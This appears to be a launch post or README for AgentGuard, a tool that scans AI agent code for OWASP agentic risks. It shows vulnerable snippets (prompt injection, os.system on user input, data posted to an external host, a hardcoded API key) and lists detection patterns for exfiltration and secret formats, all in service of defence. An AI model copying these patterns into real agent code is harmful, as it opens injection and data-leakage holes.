AgentGuard: Open-Source Security Scanning for AI Agent Code

Dockfix Labs released AgentGuard, an open-source static analysis tool that scans AI agent codebases for all 10 OWASP Agentic Security Initiative risks, including prompt injection, tool abuse, and data exfiltration. The tool can be integrated into CI/CD pipelines and supports SARIF output for GitHub code scanning, as well as a Model Context Protocol server for real-time scanning in AI coding assistants.

AI agents are being deployed at scale — in customer support, code generation, data analysis, and autonomous workflows. But the code that powers these agents is rarely security-audited. Consider this pattern, common in production agent codebases: user input = request.json "prompt" prompt = f"You are a helpful assistant. {user input}" response = openai.chat.completions.create model="gpt-4", messages= {"role": "user", "content": prompt} This is a prompt injection vulnerability. A user can override the system prompt and manipulate the agent's behavior. It is the AI equivalent of SQL injection — and it is everywhere. The OWASP Agentic Security Initiative https://owasp.org/www-project-agentic-security/ published a Top 10 list of risks specific to AI agent systems: | ID | Risk | |---|---| | ASI01 | Prompt Injection | | ASI02 | Tool Abuse / Unintended Tool Use | | ASI03 | Data Exfiltration / Sensitive Data Leakage | | ASI04 | Unauthorized Actions / Excessive Agency | | ASI05 | Supply Chain / Untrusted Components | | ASI06 | Insecure Output Handling | | ASI07 | Credential / Secret Exposure | | ASI08 | Context Window Manipulation | | ASI09 | Agent Loop Exploitation | | ASI10 | Trust Boundary Violation | Most of these have no coverage in traditional SAST tools. Semgrep and CodeQL were built for a world without LLMs. AgentGuard https://github.com/dockfixlabs/agentguard is an open-source static analysis tool that scans AI agent codebases for all 10 OWASP ASI categories. pip install dfx-agentguard Scan current directory agentguard . JSON output for CI/CD agentguard src/ --format json SARIF for GitHub code scanning agentguard . --format sarif Prompt Injection ASI01 — f-string prompt construction, string concatenation with user input, system prompt overrides. Vulnerable prompt = f"You are a helpful assistant. {user input}" AgentGuard flags this as ASI01-PROMPT-INJECTION Tool Abuse ASI02 — os.system , subprocess with user input, eval / exec in agent tool functions. python Vulnerable def run command query : return os.system f"echo {query}" AgentGuard flags this as ASI02-TOOL-ABUSE Data Exfiltration ASI03 — requests.post to external URLs, fetch calls, webhook configurations, DNS-based exfiltration patterns, subprocess curl / wget calls. Vulnerable requests.post "https://analytics-server.com/collect", json=agent data AgentGuard flags this as ASI03-DATA-EXFIL Credential Exposure ASI07 — hardcoded API keys sk-proj- , AKIA , ghp , private keys, connection strings with passwords, wallet seed phrases, Slack tokens, Google API keys. Vulnerable OPENAI API KEY = "sk-proj-Tq8m2X4vN7bR1wK9pL3hY6jD5cF0aZ8s" AgentGuard flags this as ASI07-CREDENTIAL-LEAK Plus: Excessive Agency ASI04 , Supply Chain ASI05 , Insecure Output Handling ASI06 , Context Manipulation ASI08 , Agent Loop Exploitation ASI09 , Trust Boundary Violations ASI10 . agentguard . --format text agentguard . --format json --exit-code agentguard . --format sarif .pre-commit-config.yaml repos: - repo: https://github.com/dockfixlabs/agentguard rev: v0.2.2 hooks: - id: agentguard .github/workflows/security.yml name: Agent Security Scan on: pull request jobs: scan: runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 - uses: dockfixlabs/agentguard@v0.2.2 with: path: src/ format: sarif AgentGuard can run as a Model Context Protocol server, letting AI coding assistants Claude Code, Cursor scan code in real-time: agentguard --mcp Inline diagnostics, scan-on-save, and a findings tree view. Available as a VSIX on the releases page https://github.com/dockfixlabs/agentguard-vscode/releases . The AgentGuard Benchmark https://github.com/dockfixlabs/agentguard-benchmark provides 28 vulnerable code samples across 5 OWASP ASI categories, plus clean code for false-positive testing. git clone https://github.com/dockfixlabs/agentguard-benchmark cd agentguard-benchmark python benchmark.py Full roadmap on GitHub https://github.com/dockfixlabs/agentguard/blob/main/ROADMAP.md . | Repository | Description | |---|---| | pip install dfx-agentguard agentguard . --format text If you find this useful, star the repo on GitHub https://github.com/dockfixlabs/agentguard . Contributions welcome — see CONTRIBUTING.md https://github.com/dockfixlabs/agentguard/blob/main/CONTRIBUTING.md . AgentGuard is MIT-licensed and built by Dockfix Labs.